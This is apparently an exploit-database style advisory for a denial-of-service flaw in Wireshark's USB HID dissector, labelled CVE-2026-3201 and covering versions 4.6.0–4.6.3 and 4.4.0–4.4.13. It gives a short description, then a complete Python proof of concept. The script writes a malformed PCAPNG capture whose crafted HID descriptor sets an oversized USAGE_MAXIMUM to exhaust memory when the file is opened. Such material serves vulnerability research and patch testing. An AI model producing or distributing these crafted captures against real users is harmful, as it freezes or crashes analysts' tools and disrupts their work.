=============================================================================================================================================
| # Title     : Wireshark 4.6.0 to 4.6.3, 4.4.0 to 4.4.13 USB HID Protocol Dissector Memory Exhaustion                                      |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://www.wireshark.org/                                                                                                  |
=============================================================================================================================================

[+] Summary    :  CVE-2026-3201 is a Denial-of-Service (DoS) vulnerability affecting the USB HID protocol dissector in Wireshark versions:

4.6.0 through 4.6.3

4.4.0 through 4.4.13

The vulnerability is triggered when Wireshark parses a specially crafted USB HID Report Descriptor containing an excessively large USAGE_MAXIMUM value.

When such a malformed capture file (e.g., PCAPNG with USBPcap link type 249) is opened, the dissector attempts to allocate memory based on the attacker-controlled value. 

Due to insufficient bounds checking, this can cause uncontrolled memory growth (e.g., via internal array expansion such as wmem_array_grow()), leading to:

Excessive memory consumption

Application freeze

Application crash

[+] Vulnerability Type : Category: Denial of Service (DoS)

[+] POC   :  

import struct
from scapy.all import *

def generate_perfect_exploit():
    print("[*] Building Refined Malicious USB HID Payload...")

    malicious_hid = (
        b"\x05\x01"            
        b"\x09\x06"          
        b"\xa1\x01"            
        b"\x19\x00"            
        b"\x2b\x00\x00\x00\x10" 
        b"\xc0"                 
    )

    header_len = 27
    data_len = len(malicious_hid)
    total_len = header_len + data_len
    usb_header = struct.pack("<H Q H B B B B I", 
        header_len,         
        0xDEADBEEFCAFEBABE,  
        1,                   
        1,                   
        0x80,               
        0x02,               
        ord('C'),           
        data_len             
    )
    usb_header += b"\x00" * (header_len - len(usb_header))
    full_pkt = usb_header + malicious_hid
    with open("wireshark_usb_dos_fixed.pcapng", "wb") as f:
        f.write(struct.pack("<I I I I Q", 0x0A0D0D0A, 0x1C, 0x1A2B3C4D, 0x00010000, 0xFFFFFFFFFFFFFFFF))
        f.write(struct.pack("<I I H H I", 0x00000001, 0x14, 249, 0, 0x00000000)) 
        epb_body = struct.pack("<I I I I I", 0, total_len, total_len, 0, 0) + full_pkt
        pad = (4 - (len(epb_body) % 4)) % 4
        epb_total_len = len(epb_body) + 12 + pad      
        f.write(struct.pack("<I I", 0x00000006, epb_total_len)) # Type & Total Length
        f.write(epb_body + (b"\x00" * pad))
        f.write(struct.pack("<I", epb_total_len)) # Total Length footer

    print("[!] Success: 'wireshark_usb_dos_fixed.pcapng' generated.")
    print("[*] Logic: USAGE_MAX (0x10000000) will trigger wmem_array_grow() exhaustion.")

if __name__ == "__main__":
    generate_perfect_exploit()
	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================